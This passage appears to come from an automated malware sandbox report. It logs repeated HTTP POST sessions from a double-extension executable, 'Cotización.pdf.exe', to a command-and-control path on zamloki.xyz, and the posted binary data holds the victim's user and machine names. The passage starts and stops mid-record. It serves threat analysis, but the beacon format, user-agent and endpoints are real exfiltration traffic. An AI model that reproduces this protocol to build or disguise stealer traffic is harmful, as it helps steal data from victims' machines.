                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    53 | 192.168.2.3 | 49790 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:19.212323904 CEST | 5561 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:19.230227947 CEST | 5561 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:19.470421076 CEST | 5562 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:19 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xwYuDtH9HSQxBwSyFpvJqqlSoWzUlMc4QGwbj2psWbqdbXdSRHZXhg8E3mYCUY%2F7VIhPtvAHszUo0DkwuhYrOThYiXuw8LIbDlkOpUhI7zI7rD6j6cLPQR00NgNgtg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f4229e04e0d-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    54 | 192.168.2.3 | 49791 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:19.722256899 CEST | 5563 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:19.744975090 CEST | 5563 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:20.622111082 CEST | 5564 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B77JN6OzxShMVQhsJjC6W75slw7YWZLL4bKIBNZs0%2FI55DRYup42ufFFa05rNg4BuUPzmTBPWWC0y0yhziSMwL7We2mBoCDodZYFBjDmxh0Ggu5tLNS46Kkcm2Aydw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f455851dfef-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    55 | 192.168.2.3 | 49792 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:20.870407104 CEST | 5565 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:20.889235020 CEST | 5565 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:21.413121939 CEST | 5566 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:21 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f2oflzZXhzuy%2FPvGnRg6nTrIF5sCkIB66kDycIhwFgmMwOqnyKhY%2BhTWW65%2BYvz3BkY6JWuf9h5q9qdQdhnqIUrjrSsqMSGWjqKSxNBarHVx601WQvLj51jOF6FXCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f4c8dafe007-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    56 | 192.168.2.3 | 49793 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:21.693624973 CEST | 5567 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:21.713644981 CEST | 5567 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:21.994177103 CEST | 5568 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:21 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZWw1SDhu8rvBppNoNp%2FivpzmwECA5BIYnCnRfujHmL6b9dl%2BnY3sLAeMI8ny9h0wEy27GW53s2ekdr%2BwofNYUmT7Y27izqTkKDB5UF71fT1T6JqIeA66o454%2B6hr5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f51a8a71f15-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    57 | 192.168.2.3 | 49794 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:22.326073885 CEST | 5568 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:22.343779087 CEST | 5569 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:22.615356922 CEST | 5569 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:22 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G9R6P%2FUfscJM2drHYhSUZyZ%2BQl8UpsZoxa7jmicZduTDk18CZAo45v8whnQDEMD14gft9ID45GirIZatdOgNq5wIIQjrdyDFxg0246FOQoVSa1B3in%2BKxK9H3%2FXcJg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f559fe02be9-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    58 | 192.168.2.3 | 49795 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:22.876754045 CEST | 5570 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:22.896707058 CEST | 5571 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:23.157938957 CEST | 5571 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:23 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mqWUv%2FgqHKsORbchK4GvquBftjuNzgcLPH12FxyWZH8FRtzrsKxmM4Rv4lvGWNG3vpv7Wh2VeS7E1HyFUx2yemh97B2vpOtOXkLlBK6g%2FsixeOS495F1%2FYj3YH0hqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f591bedd6ed-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    59 | 192.168.2.3 | 49796 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:23.408567905 CEST | 5572 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:23.430516005 CEST | 5572 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:23.669811010 CEST | 5573 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:23 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=91z%2BD3vR6y0IrXr4Pn5q3i%2F2a4RqYbSNjre%2By3BO6FoUG1gu3dz0r4eHcAXYVJ5cJmR7HS%2FGX20BJDoT0505AfjlH%2BCnG0cgbHDE%2FqAzlBDWHH3BieZgFxpYymdCCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f5c58521f1d-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    6 | 192.168.2.3 | 49733 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:01:51.305397034 CEST | 1287 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:51.323781013 CEST | 1287 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:51.579050064 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Apn%2B0OCyMoyrF1QgosNV63WSd7UTZUrhhcOSj1x7eJdRh63XjOw41%2FPjXyIswzef7HQ%2By3U505zg7mxsZmPRPvOLraD02fnVUZg9W2lRtvvTZ5SykdWn07Sp0RkLoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e93b9494e3e-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Jul 21, 2021 17:01:51.579077005 CEST | 1289 | IN | Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    60 | 192.168.2.3 | 49797 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:23.925389051 CEST | 5574 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:23.945388079 CEST | 5574 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:24.259855032 CEST | 5575 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:24 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gQk4fQnfkXx6URy5O09nFuSFrfzyH%2FWCupw4nwGLk%2B6srXTcpwobki%2BpYfaLdqPPOuFbSoNplWtCzgRIhDE9kV2alqU0IgWs7miWR6JgvY4lvw9B6kvLkfCmla4o7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f5f9cddc272-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    61 | 192.168.2.3 | 49798 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:24.558290958 CEST | 5576 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:24.576527119 CEST | 5576 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:24.869791031 CEST | 5577 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:24 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OMiXrCRCdEzLKGAnM6cqMhqRsnSfBRehcNMBeKYiBzbksxE26D3ZFkPLGLh1JfmoSGe58MQTc7%2BE3X3uYEIXsmj4i%2BJoUDNlUI80WSuGIINUEoN9nghtGfWOvVWAjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f639f2d4d8a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    62 | 192.168.2.3 | 49799 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:25.091660023 CEST | 5578 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:25.111491919 CEST | 5578 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:25.365453005 CEST | 5579 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:25 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xuwbtfL%2B6YoqE2L0apkV0efWyJFcjuV4PQE%2BOVDxRbcXLtPr7Yo2MgffRV5GGBtwy1HaRMnfgxmohW6WPdOQsWqib%2Ft7002IWkU6QtlibcEuTXI4kSUjXNKgLRhGzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f66eaa0dfdb-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    63 | 192.168.2.3 | 49800 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:25.575840950 CEST | 5580 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:25.593796968 CEST | 5580 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:25.836390972 CEST | 5581 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:25 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=C9Bfs8mU3WtQr9RtG11CT9coAvVpHPOmuzNdtaAJwT7E0Ges8fZiW4QC8648OPKbVBzImB5j%2FAMfII2G4zpTH4gCthC3z%2F4sRysM9Akc4RWA1dqM29oyYhgUMEhQqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f69e8b94e61-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    64 | 192.168.2.3 | 49801 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:26.075061083 CEST | 5581 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:26.095393896 CEST | 5582 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:26.424388885 CEST | 5582 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:26 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nop65%2FXLUZ%2BIXbA7Yo%2BGmS9XujbsfjexHRGjZm7Tvf%2BIh8tqza%2BYy9%2FnzboxhKV5bc67nlAdp%2Fx%2FDhA2sgYm9PdrIbVUEnsLRPK%2FYwrck3V%2FeP9tyKhcpkURW9TlRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f6d0c201f25-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    65 | 192.168.2.3 | 49802 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
